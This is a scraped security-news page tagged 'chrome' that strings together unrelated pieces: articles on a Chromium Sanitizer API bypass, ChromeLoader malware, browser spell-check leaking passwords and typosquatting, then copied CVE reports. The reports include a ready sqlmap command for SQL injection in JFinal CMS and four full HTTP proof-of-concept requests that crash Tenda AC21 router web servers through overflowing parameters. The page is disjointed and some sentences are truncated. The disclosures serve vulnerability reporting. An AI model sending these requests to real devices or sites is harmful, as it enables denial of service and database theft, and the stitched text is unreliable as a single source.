Issue highlights the challenges of preventing client-side attacks

Issue highlights the challenges of preventing client-side attacks

  

A prototype pollution bug in the Chromium project allowed attackers to bypass Sanitizer API, a built-in browser library for removing potentially malicious code from user-controlled input sources.

Prototype pollution is a type of JavaScript vulnerability that allows attackers to exploit the rules of the programming language to change an application’s behavior and compromise it in various ways.

Reported by security researcher Michał Bentkowski, the bug highlights the challenges of preventing client-side prototype pollution attacks.

**Client-side prototype pollution**

Prototype pollution can happen both on the client side (browser) and server side (Node.js servers). Bentkowski, who has done extensive research on the topic, discovered the new bug while exploring client-side prototype pollution vulnerabilities in Chromium.

The Sanitizer API was added to Chromium browsers to support native sanitization as a replacement for third-party libraries such as DOMPurify.

According to Bentkowski’s findings, if the JavaScript object Sanitizer is instantiated with an empty object as argument, it will trigger an internal mechanism that bypasses the sanitization flow. Bentkowski told The Daily Swig that the empty object causes the browser “to traverse the prototype chain”.

BACKGROUND Prototype pollution: The dangerous and underrated flaw impacting JavaScript applications

As proof of concept, Bentkowski showed that the API misses sanitizing a JavaScript snippet embedded in an SVG object. Once the supposedly sanitized SVG is inserted into the page, the JavaScript code is executed.

In his report, Bentkowski notes that for the vulnerability to work, the browser’s must be enabled.

“My guess is that there’s a low amount of people with this flag enabled,” Bentkowski said. “However, the Sanitizer API is enabled by default in Chrome 105 (released at the end of August), so the impacted user base is now greater.”

**Bug or feature?**

The discussion thread on the Chromium bug tracker shows some of the complexities of drawing the boundaries on prototype pollution bugs. Manipulating prototypes is one of the features that make JavaScript flexible and versatile, which means that hardening applications against prototype pollution attacks will always require meticulous efforts by web developers.

As one security researcher noted in the discussion thread, the prototype pollution vector is not something that should be addressed in Sanitizer API.

“Environments that have their Object prototypes polluted are already compromised, and I don’t think selectively hardening chosen web APIs against that would offer much practical benefit, and it may only offer a false sense of security, at the expense of API cognitive complexity,” the researcher wrote.

“Before reporting the bug I was unaware that there exists a WebIDL spec that specifically defines that the prototype chain must be traversed by Web APIs,” Bentkowski said.

“This means that in fact, it is a feature, and this cannot be changed right now because that would be backward-incompatible; that is, many applications would be broken.”

Developers, therefore, need to identify and remove all gadgets that pollute prototypes from user-controlled sources.

Nonetheless, Bentkowski’s discovery did result in some fixes. “\[The bug\] only worked on the SVG example. In the end, this was the real bug in the submission,” he said.

“Prototype pollution by itself was considered a ‘feature’. However, it shouldn’t have been possible to bypass the Sanitizer by the specially constructed configuration object.”

DON’T MISS Uber hack linked to hardcoded secrets spotted in PowerShell script

Prototype pollution bug in Chromium bypassed Sanitizer API

Microsoft and VMware are warning that the malware, which first surfaced as a browser-hijacking credential stealer, is now being used to drop ransomware, steal data, and crash systems at enterprises.

Security researchers are sounding the alarm on the malware tool dubbed ChromeLoader. It first surfaced in January as a consumer-focused, browser-hijacking credential stealer but has now evolved into a widely prevalent and multifaceted threat to organizations across multiple industries.

In an advisory released Sept. 19, researchers from VMware's Carbon Black managed detection and response team said they have recently observed the malware being used to also drop ransomware, steal sensitive data, and deploy so-called decompression (or zip) bombs to crash systems.

The researchers said they have observed hundreds of attacks involving newer versions of the malware targeting enterprises in business services, education, government, healthcare, and multiple other sectors. 

"This campaign has gone through many changes over the past few months, and we don’t expect it to stop," the researchers warned. "It is imperative that these industries take note of the prevalence of this \[threat\] and prepare to respond to it."

**Ongoing & Prevalent Campaign**

VMware's warning echoed one from Microsoft's Security Intelligence team Friday about a threat actor they are tracking as DEV-0796, which is using ChromeLoader in an extensive and ongoing click-fraud campaign. In a series of tweets, the researchers said the cyberattackers were attempting to monetize clicks generated by a browser extension or browser node-webkit that ChromeLoader had secretly downloaded on numerous user devices.

"This campaign begins with an .ISO file that's downloaded when a user clicks malicious ads or YouTube comments," according to Microsoft's analysis. When opened, the .ISO file installs the aforementioned browser node-webkit (NW.js) or a browser extension. 

"We’ve also seen the use of DMG files, indicating multi-platform activity," Microsoft researchers added.

ChromeLoader (aka ChromeBack or Choziosi Loader) grabbed attention in January when researchers observed malware operators using it to drop a malicious browser extension as a payload on user systems. The malware targeted users who visited sites touting cracked video games and pirated torrents. 

Researchers from Palo Alto Networks' Unit 42 threat hunting team described the infection vector as starting with a user scanning a QR code on those sites with the intention of downloading pirated content. The QR code redirected the user to a compromised website, where they were persuaded to download an .ISO image purporting to be the pirated file, which contained an installer file and several other hidden ones.

When users launched the installer file, they received a message indicating that the download had failed — while in the background a PowerShell script in the malware downloaded a malicious Chrome extension on the user's browser, Unit 42 researchers found.

**Rapid Evolution**

Since arriving on the scene earlier this year, the malware's authors have released multiple versions, many of them equipped with different malicious capabilities. One of them is a variant called Bloom.exe that made its initial appearance in March and has since infected at least 50 VMware Carbon Black customers. VMware's researchers said they observed the malware being used to exfiltrate sensitive data from infected systems. 

Another ChromeLoader variant is being used to drop zip bombs on user systems, i.e. malicious archive files. Users who click on the weaponized compression files end up launching malware that overloads their systems with data and crashes them. And since August, the operators of the appropriately named CrashLoader variant have been using the malware to distribute a ransomware family called Enigma.

**ChromeLoader's Updated Malicious Tactics**

Along with the payloads, the tactics for getting users to download ChromeLoader have also evolved. For instance, VMware Carbon Black researchers said they have seen the malware's author's impersonating various legitimate services to lead users to ChromeLoader. 

One service they have impersonated is OpenSubtitles, a site designed to help users to find subtitles for popular TV shows and movies, VMware said in its report. Another is FLB Music Play, a site for playing music. 

"The impersonated software is used in conjunction with an adware program that redirects web traffic, steals credentials, and recommends other malicious downloads posed as legitimate updates," VMware said.

Often, consumers are the primary targets of malware such as ChromeLoader. But with many employees now working from home, and often using their personally owned devices to access enterprise data and applications, enterprises can end up being impacted as well. VMware's Carbon Black team, like Microsoft's security researchers, said they believe the current campaign is only a harbinger of more attacks involving ChromeLoader.  

"The Carbon Black MDR team believes this is an emerging threat that needs to be tracked and taken seriously," VMware said in its advisory, "due to its potential for delivering more nefarious malware."

ChromeLoader Malware Evolves into Prevalent, More Dangerous Cyber Threat

It's called "spell-jacking": Both browsers have spell-check features that send data to Microsoft and Google when users fill out forms for websites or Web services.

Spell-checking features present in both the Google Chrome and Microsoft Edge browsers are leaking sensitive user information — including username, email, and passwords — to Google and Microsoft, respectively, when people fill in forms on popular websites and cloud-based enterprise apps.  

The issue — dubbed "spell-jacking" by researchers at client-side security firm Otto JavaScript Security (Otto-js) — can expose personally identifiable information (PII) from some of the most widely used enterprise applications, including Alibaba, Amazon Web Services, Google Cloud, LastPass, and Office 365, according to a blog post published Sept. 16.

Otto-js co-founder and CTO Josh Summit discovered the leakage — which occurs specifically when Chrome's Enhanced Spellcheck and Edge's MS Editor are enabled on browsers —  
while conducting research on how browsers leak data in general.

Summit found that these spell-check features send data to Google and Microsoft that's entered into form fields — such as username, email, date of birth, and Social Security number — when someone fills out these forms on websites or Web services while using the browsers, the researchers said.

Chrome and Edge also will leak user passwords if the "show password" feature is clicked when someone enters a password into a site or service, sending that data to Google and Microsoft's third-party servers, they said.

**Where the Privacy Risk Lies**

Otto-js researchers, who posted a video on YouTube demonstrating how the leakage occurs, tested more than 50 websites that people use daily or weekly that have access to PII. They broke 30 of those into a control group spanning six categories — online banking, cloud office tools, healthcare, government, social media, and e-commerce — and selected websites for each category based on the top ranking in each industry.

Of the 30 control group websites tested, 96.7% sent data with PII back to Google and Microsoft, while 73% sent passwords when "show password" was clicked. Moreover, the ones that did not send passwords had not actually mitigated the issue; they just lacked the "show password" feature, the researchers said.

Of the websites that the researchers investigated, Google is the only one that already had fixed the issue for email and some services. Otto-js found that the company's Web service Google Cloud Secret Manager remains vulnerable, however.

Meanwhile, Auth0, a popular single sign-on service, was not in the control group that the researchers had investigated but was the only website other than Google that had correctly mitigated the issue, they said.

Google's Enhanced spell-check feature, which requires an opt-in from the user, handles the data in an anonymized way, according to a Google spokesperson.

"The text typed by the user may be sensitive personal information and Google does not attach it to any user identity and only processes it on the server temporarily," he tells Dark Reading. "To further ensure user privacy, we will be working to exclude passwords proactively from spell check. We appreciate the collaboration with the security community, and we are always looking for ways to better protect user privacy and sensitive information."

Users of a number of enterprise cloud-based applications also are at risk when entering forms while using the apps on Chrome and Edge if the spell-check features are enabled. Of those aforementioned services, security teams from Amazon Web Services (AWS) and LastPass responded to Otto-js and already have remedied the issue, the researchers said.

**Where Does the Data Go?**

One big question that arises is what happens to the data once it's received by Google and Microsoft, which the researchers said they can't clearly answer.

At this point, no one knows if the data is being stored on the receiving end or, if this is the case, who is managing its security, the researchers noted. It's also not clear if the data is managed with the same level of security as known sensitive data such as passwords, or if it's being used by product teams as metadata for refining models, they said.

Either way, researchers observed that the issue once again raises the concern about technology companies such as Google and Microsoft having so much access to sensitive information about customers, employees, and companies, particularly when it comes to passwords.

"Passwords are meant to be a secret you share with the party you intended, and no one else," they wrote in the post. "A shared secret should be hashed and irreversible, but this feature violates a fundamental security principle of 'need-to-know' and could be considered a violation of privacy."

**Easily Overlooked Issue**

Moreover, the data leakage can be widespread for users or enterprises for a number of reasons, the researchers noted. One is that because the browser features that expose the data are actually helpful to users, they are likely to be turned on and exposing data without a user's knowledge.

"What's concerning is how easy these features are to enable and that most users will enable these features without really realizing what is happening in the background," Summit says.

The password exposure also occurs as an "unintended interaction" between browser spell-check and a website feature, making it something that might easily fly under the radar, notes Walter Hoehn, vice president of engineering at Otto-js

"The enhanced spell-checking features in Chrome and Edge offer a significant upgrade over the default dictionary-based methods," he says. "Likewise, websites that provide the option of displaying passwords in cleartext are more usable, especially for those with disabilities."

**Path of Mitigation**

Even if a website or service has not fixed the issue from its side, enterprises can mitigate the risk of sharing their customers' PII entered into forms by adding "spellcheck=false" to all input fields, although this could create problems for users, researchers acknowledged.

Alternatively, enterprises can just add the command only to form fields with sensitive data to remove the risk, or they could take away the "show password" feature in their forms, they said. This won't prevent spell-jacking, but it will prevent passwords from being sent, the researchers said.

Companies also can mitigate internal exposure of company-owned accounts by implementing endpoint security precautions that disable enhanced spellcheck features and limiting employees from installing unapproved browser extensions, according to Otto-JS.

Consumers can mitigate their own risk of having their data sent to Microsoft and Google without their knowledge by going into their browsers and disabling the respective spell-check culprits, the researchers added.

Spell-Checking in Google Chrome, Microsoft Edge Browsers Leaks Passwords

Final CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/admin/friendlylink/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**TEST**

    POST /jfinal_cms/admin/friendlylink/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 96
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/friendlylink/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10

CVE-2022-37204: someEXP_of_jfinal_cms/sql7.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Valine v1.4.18 was discovered to contain a remote code execution (RCE) vulnerability which allows attackers to execute arbitrary code via a crafted POST request.

**可复现问题的步骤 The steps to reproduce.****The latest version of valine is 1.4.18****First select a page to test : https://valine.js.org/hexo.html**

**Capture the packet then modify the post of the packet and sent**

**below payload will make the comments look normal and allows code execution，Google Chrome and Firefox will all be attacked.**

**It work**

**The alarm information is related to other failed test codes. Please ignore it****可复现问题的网页地址 A minimal demo**

https://valine.js.org/  
https://valine.js.org/hexo.html  
http://luckyzmj.cn/posts/1d6f1579.html  

maybe all websites which is using the project will be influenced

**受影响的Valine版本、操作系统，以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?**

Valine1.4.18  
win10  
Google Chrome and Firefox

CVE-2022-38545: A  XSS bug that can execute code（用户恶意修改 评论 的ua可触发XSS执行代码） · Issue #400 · xCss/Valine

Categories: News
Tags: typosquatting

Tags:  sniffies

Tags:  extensions

Tags:  fake av

Tags:  screen locker

Tags:  advertising

Tags:  PUP.Optional.AdMax

A researcher found a list of over 50 shady domains based on spelling variations of the brand name Sniffies.



(Read more...)




The post Hookup site targeted by typo-squatters appeared first on Malwarebytes Labs.

Posted: September 19, 2022 by

Ethical hacker and security researcher Kody Kinzie shared with BleepingComputer a list of over 50 domains of which many are spelling variations of the brand name Sniffies.

Sniffies identifies itself as a “modern, map-based, meetup app for gay, bi, and curious guys.”

Kody used an open source tool called DNSTwist to generate a list of lookalike domains for Sniffies.com. Out of the 3531 possibilities generated by the tool, 51 represented valid domains.

"I saw a good amount of domains registered with the same MX server set up, even though the domains were hosted on random platforms."

A mail exchanger record (MX record) specifies the mail server responsible for accepting email messages on behalf of a domain name. So that would imply that the domains were set up by the same threat-actor.

**Typosquatting**

Typosquatting is a term you may have seen when reading about Internet scams. In essence it relies on users making typing errors (typos) when entering a site or domain name. Sometimes it is also referred to as URL hijacking or domain mimicry, but IMHO the word typosquatting more accurately describes the matter. As you will understand, the success of a typosquat scammer depends on the number of victims that are likely to misspell the intended domain and land on the scammers’ pages.

One factor is the popularity of the domain. With an estimated number of 79,600 visitors per day, Sniffies certainly qualifies in that department.

**Advertising**

BleepingComputer’s test results were described as:

“Once accessed, the illicit 'Sniffies' copycat domains do one of the following things:

*   Push the user to install dubious Chrome extensions
*   Launch the 'Music' App on Apple devices right from the web browser
*   Lead the users to bogus technical 'support' scam sites
*   Lead the users to fake job posting sites"

Obviously, we did some testing of our own. We found some domains that had either been abandoned or parked for the future, but some did what they were set up for—redirect visitors based on some basic system properties and the location (based on IP address).

Most of the redirects we found at Malwarebytes went to advertising sites that were more or less legitimate. But certainly not what the user would be looking for. Many shared this look, offering the visitor a few choices.

In one instance (Dutch IP, Windows system) we were redirected to a fake Microsoft Defender warning site (including soundtrack and locked screen), parked in the domain ondigitalocean.app which has been on Malwarebytes’ radar for some time.

We also found one of the Chrome extensions that BleepingComputer described as dubious. Malwarebytes detects these extensions as PUP.Optional.AdMax.

**Mitigation**

While it’s certainly nice to read how these campaigns work and how the research was done, Sniffies is just an example of what is out there.

To avoid falling victim to typosquatters, there are a few basic measures you can take, which are in essence aimed at not typing the url.

*   Bookmark your favorites
*   Use search results rather than typing the url in the address bar
*   Leave some or all of the sites that you visit every day open in your browser tabs (most popular browsers offer the option to continue where you left off or to specify a set of sites to start with)
*   Never click links in unexpected emails or on unknown sites
*   Use an antivirus or anti-malware solution that offers web protection and preferably even an anti-exploit solution.

Stay safe, everyone!

**RELATED ARTICLES**

Hookup site targeted by typo-squatters

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, setSchedWifi.

**Tenda AC21(V16.03.08.15) contains heap Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a heap overflow vulnerability in file /bin/httpd, functionsetSchedWifi  .

This vulnerability allows attackers to cause a Denial of Service (DoS) via the schedStartTimeand  schedEndTimeparameter.

the strcpy(ptr+2, v8) and strcpy(ptr+10, v7) copies strings to heap buffer without checking its length, so there is a heap overflow.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 224
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    schedStartTime=1111111111111111111111111111111111111111111111111111111111111111111111111111111&schedEndTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&schedWifiEnable=1&timeType=1
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40074: Vuln/Tenda AC21/3 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, saveParentControlInfo.

**Tenda AC21(V16.03.08.15) contains stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionsaveParentControlInfo  .

This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.

In function saveParentControlInfo, it calls compare_parentcontrol_time(a1), the vulnerability is in this function.

It calls sscanf(s, “%[^-]-%s”, v3, v4) and v4 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 137
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adwfrcvb
    Connection: close
    
    time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%2daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40073: Vuln/Tenda AC21/5 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, form_fast_setting_wifi_set.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionform_fast_setting_wifi_set

In this function, it calls sub_441F30(a1) and the vulnerability is in sub_441F30

In sub_441F30() , it calls sscanfto read strings in v5 which we can control through POST parameter timeZone. It doesn’t check the length of v5, and the v8, v9 is on the stack, so there is a stack overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 484
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    ssid=1&timeZone=1:1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40075: Vuln/Tenda AC21/1 at main · xxy1126/Vuln

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetWifiGusetBasic.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetWifiGusetBasic

Attacker can use this vulnerability via theshareSpeed parameter.

it calls strcpy(v12, v7) and v12 is on the stack, so there is a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiGuestSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 23
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    shareSpeed=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can cause httpd reboot.

Tag

#chrome